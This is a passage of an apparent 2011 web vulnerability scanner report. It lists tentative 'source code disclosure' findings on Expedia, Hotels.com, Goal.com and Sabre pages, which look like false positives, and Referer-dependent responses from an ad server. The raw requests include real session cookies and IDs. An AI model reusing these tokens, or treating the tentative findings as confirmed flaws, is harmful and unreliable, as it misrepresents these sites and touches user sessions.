GIF89a........f....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rd
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...

16.10. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/default/default/images/infosite/videoPlayLarge.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/default/default/images/infosite/videoPlayLarge.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1275-1317085617344"
Last-Modified: Tue, 27 Sep 2011 01:06:57 GMT
Content-Length: 1275
Date: Mon, 03 Oct 2011 00:13:01 GMT
Connection: close

GIF89a-.-......i.f.......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...

16.11. http://www.expedia.com/static/fusion/v2.3/images/progressAnim.gif

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.expedia.com
Path:   /static/fusion/v2.3/images/progressAnim.gif

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /static/fusion/v2.3/images/progressAnim.gif HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; JSESSION=965e7753-b813-4f22-a4ce-feaa1b098dbb; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1651-1317085619476"
Last-Modified: Tue, 27 Sep 2011 01:06:59 GMT
Content-Length: 1651
Date: Mon, 03 Oct 2011 00:09:40 GMT
Connection: close

GIF89aS..................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>.................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>
...[SNIP]...

16.12. http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.goal.com
Path:   /en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1479357280-1317599429942; __utma=167609825.336600251.1317599442.1317599442.1317599442.1; __utmb=167609825.1.10.1317599442; __utmc=167609825; __utmz=167609825.1317599442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _em_hl=1; _em_vt=6b3bfb104abb2666e789b9e202024e62e18088e413-981323754e88f8d5; _em_v=cf9911b66e4d49b949eaf13bd6fa4e88f8d57af834-210214684e88f8d5

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0,must-revalidate,s-maxage=300
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:59:09 GMT
Expires: Sat, 01 Oct 2011 23:58:44 +0000
Last-Modified: Sun, 02 Oct 2011 23:58:44 GMT
Server: ECS (sjo/522B)
Vary: Accept-Encoding
X-Cache: HIT
X-Goal-Flavors: ad970x40navbar,epleague
Content-Length: 91057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div> <?/* empty because this one does not have controls */?>
<div class="clear">
...[SNIP]...

16.13. http://www.hotels.com/bundles/enhanced_search-H36.0.2-128976.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /bundles/enhanced_search-H36.0.2-128976.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /bundles/enhanced_search-H36.0.2-128976.js HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_IE|HCOM_IE
Content-Language: en_IE
Last-Modified: Thu, 29 Sep 2011 05:00:00 GMT
ntCoent-Length: 834821
Expect:
Content-Type: text/javascript
Content-Length: 834821
Cache-Control: private, max-age=0
Expires: Mon, 03 Oct 2011 00:09:16 GMT
Date: Mon, 03 Oct 2011 00:09:16 GMT
Connection: close
Vary: Accept-Encoding

/*
* jQuery JavaScript Library v1.6.1
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizz
...[SNIP]...
<%=(.+?)%>/g,"',$1,'").split("<%").join("');").split("%>").join("p.push('")+"');}return p.join('');";return new Function("ctx",B)}}}});$.registerModule({name:"hcom.common.form.modules.field_mgr",dependencies:["hcom.common.modules.emitter"],impl:function(){v
...[SNIP]...

16.14. http://www.hotels.com/bundles/hcom-H36.0.2-128976.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.hotels.com
Path:   /bundles/hcom-H36.0.2-128976.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /bundles/hcom-H36.0.2-128976.js HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en_US
Last-Modified: Thu, 29 Sep 2011 05:00:00 GMT
ntCoent-Length: 568057
Expect:
Content-Type: text/javascript
Content-Length: 568057
Cache-Control: private, max-age=0
Expires: Mon, 03 Oct 2011 00:28:19 GMT
Date: Mon, 03 Oct 2011 00:28:19 GMT
Connection: close
Vary: Accept-Encoding

/*
* jQuery JavaScript Library v1.6.1
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizz
...[SNIP]...
<%=(.+?)%>/g,"',$1,'").split("<%").join("');").split("%>").join("p.push('")+"');}return p.join('');";return new Function("ctx",B)}}}});$.registerModule({name:"hcom.common.form.modules.field_mgr",dependencies:["hcom.common.modules.emitter"],impl:function(){v
...[SNIP]...

16.15. http://www.sabrehospitality.com/js/roundies.js

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.sabrehospitality.com
Path:   /js/roundies.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /js/roundies.js HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7578a4s2f2v2eeuc05nnpk0f35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:44 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 02 Jan 2009 03:19:06 GMT
ETag: "27cbd7-20ed-6751be80"
Accept-Ranges: bytes
Content-Length: 8429
Connection: close
Content-Type: application/x-javascript

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.d
...[SNIP]...
eturn p}('t K={16:\'K\',1L:G,1M:G,1d:G,2f:y(){u(D.2g!=8&&D.1N&&!D.1N[q.16]){q.1L=M;q.1M=M}17 u(D.2g==8){q.1d=M}},2h:D.2i,1O:[],1b:{},2j:y(){u(q.1L||q.1M){D.1N.2L(q.16,\'2M:2N-2O-2P:x\')}u(q.1d){D.2Q(\'<?2R 2S="\'+q.16+\'" 2T="#1P#2k" ?>\')}},2l:y(){t a=D.1k(\'z\');D.2m.1w.1Q(a,D.2m.1w.1w);u(a.12){2n{t b=a.12;b.1x(q.16+\'\\\\:*\',\'{1l:2U(#1P#2k)}\');q.12=b}2o(2p){}}17{q.12=a}},1x:y(a,b,c){u(1R b==\'1S\'||b===2V){b=0}u(b.2W.2q().1y(\'
...[SNIP]...

17. Referer-dependent response
There are 6 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



17.1. http://d.tradex.openx.com/afr.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://d.tradex.openx.com
Path:   /afr.php

Request 1

GET /afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response 1

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0; expires=Mon, 01-Oct-2012 23:52:00 GMT; path=/
Content-Length: 2906
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<script type="text/javascript">
OXM_ad = {"website":"c8eddb4a-d9d5-0c5b-6e12-562295aa26ea",
"size":"728x90",
"floor":"1.3",
"url":"http:\/\/www.goal.com\/en\/teams\/england\/97\/man-utd-news",
"channel":"oxpv1:34-632-1929-2254-6393",
"hrid":"b89b59a608f5ce9fb11f3ce62d19c7a3-1317599520",
"beacon":"<div id='beacon_d3da79db02' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=1929&amp;campaignid=632&amp;zoneid=6393&amp;cb=d3da79db02&amp;r_id=b89b59a608f5ce9fb11f3ce62d19c7a3&amp;r_ts=lsgqao' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>",
"fallback":"<!-- Rubicon Project tag -->\r\n<!-- Site: Goal.com Zone: My Site Size: Leaderboard (728x90) -->\r\n<script language=\"JavaScript\" type=\"text\/javascript\">\r\nvar cb = Math.random();\r\nvar d = document;\r\nd.write('<script language=\"JavaScript\" type=\"text\/javascript\"');\r\nd.write('src=\"http:\/\/optimized-by.rubiconproject.com\/a\/7743\/12359\/21900-2.js?cb='+cb+'\">');\r\nd.write('<\\\/scr'+'ipt>');\r\n<\/script>\r\n<!-- end Rubicon Project tag --><div id='beacon_d3da79db02' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=10996&amp;campaignid=3553&amp;zoneid=6393&amp;loc=1&amp;referer=http%3A%2F%2Fwww.goal.com%2Fen%2Fteams%2Fengland%2F97%2Fman-utd-news&amp;cb=d3da79db02&amp;r_id=b89b59a608f5ce9fb11f3ce62d19c7a3&amp;r_ts=lsgqao' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>"};
</script>
<script type="text/javascript" src="http://bid.openx.net/jstag"></script>
<noscript><!-- Rubicon Project tag -->
<!-- Site: Goal.com Zone: My Site Size: Leaderboard (728x90) -->
<script language="JavaScript" type="text/javascript">
var cb = Math.random();
var d = document;
d.write('<script language="JavaScript" type="text/javascript"');
d.write('src="http://optimized-by.rubiconproject.com/a/7743/12359/21900-2.js?cb='+cb+'">');
d.write('<\/scr'+'ipt>');
</script>
<!-- end Rubicon Project tag --><div id='beacon_d3da79db02' style='posit
...[SNIP]...

Request 2

GET /afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; OAID=6f699005174db05207a17138d8473dc0

Response 2

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc071952f762daf6c74f0896932; expires=Mon, 01-Oct-2012 23:52:04 GMT; path=/
Content-Length: 2675
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<script type="text/javascript">
OXM_ad = {"website":"c8eddb4a-d9d5-0c5b-6e12-562295aa26ea",
"size":"728x90",
"floor":"1.3",
"channel":"oxpv1:34-632-1929-2254-6393",
"hrid":"f98c64efa22cad311498b5f294063ae9-1317599524",
"beacon":"<div id='beacon_b556676292' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=1929&amp;campaignid=632&amp;zoneid=6393&amp;cb=b556676292&amp;r_id=f98c64efa22cad311498b5f294063ae9&amp;r_ts=lsgqas' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>",
"fallback":"<!-- Rubicon Project tag -->\r\n<!-- Site: Goal.com Zone: My Site Size: Leaderboard (728x90) -->\r\n<script language=\"JavaScript\" type=\"text\/javascript\">\r\nvar cb = Math.random();\r\nvar d = document;\r\nd.write('<script language=\"JavaScript\" type=\"text\/javascript\"');\r\nd.write('src=\"http:\/\/optimized-by.rubiconproject.com\/a\/7743\/12359\/21900-2.js?cb='+cb+'\">');\r\nd.write('<\\\/scr'+'ipt>');\r\n<\/script>\r\n<!-- end Rubicon Project tag --><div id='beacon_b556676292' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=10996&amp;campaignid=3553&amp;zoneid=6393&amp;loc=1&amp;cb=b556676292&amp;r_id=f98c64efa22cad311498b5f294063ae9&amp;r_ts=lsgqas' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>"};
</script>
<script type="text/javascript" src="http://bid.openx.net/jstag"></script>
<noscript><!-- Rubicon Project tag -->
<!-- Site: Goal.com Zone: My Site Size: Leaderboard (728x90) -->
<script language="JavaScript" type="text/javascript">
var cb = Math.random();
var d = document;
d.write('<script language="JavaScript" type="text/javascript"');
d.write('src="http://optimized-by.rubiconproject.com/a/7743/12359/21900-2.js?cb='+cb+'">');
d.write('<\/scr'+'ipt>');
</script>
<!-- end Rubicon Project tag --><div id='beacon_b556676292' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://d.tradex.openx.com/lg.php?bannerid=10996&amp;campaignid=3553&amp;zoneid=639
...[SNIP]...

17.2. http://delivery.hotels.com/Hotels/Delivery.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://delivery.hotels.com
Path:   /Hotels/Delivery.aspx

Request 1

GET /Hotels/Delivery.aspx?LAN=en_US&P=PROPERTY_DESCRIPTION&D=BOS&CI=10%2f04%2f2011&CO=10%2f07%2f2011&pr=1&pa0=2&RID=A2AFB563-0907-4A03-86F0-03006AED6E0E&H=279478&HP=289.0 HTTP/1.1
Host: delivery.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; UID=1961757583|1|0; hl_upm=Y4E7n03ene2ZDIPTWpLM1HtSrQx1OyDdsY4KBK1Ss8UP/OJVjMn5RXwMzdzUolZoFNbG0LY/3md8l5aT/KgDPt+3IVCZ0+X/OJlVTBCzzIJq6mbaXw5f2OTC9SJuffV9JxhkotBEViCI9C/lLFfEkan9sqnGJkiNO063snxtu5wSxTUNe8/bIJVcqrlCAl0XA9V5PzeRLbpFrDHWUr91KWkqiLKfvmiC1YyVop9id6jRgWqmJcXrStYZxh1Ko0KZmHsu1OyGvCuBJj15A4max6Cfmtx38OoK; hl_ubm=YDnUkiZb5XknMSm4p9+V5cZHCQxkEJ6V6VqmAnOws74lcpUw6ATilWACOa7+CMV6BPk9KWTKRZCo+bSXw6V1OBTkPGiowZ+0FoEtWiQ+BQ8=; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: UID=1961757583|1|0; expires=Tue, 02-Oct-2012 00:28:52 GMT; path=/
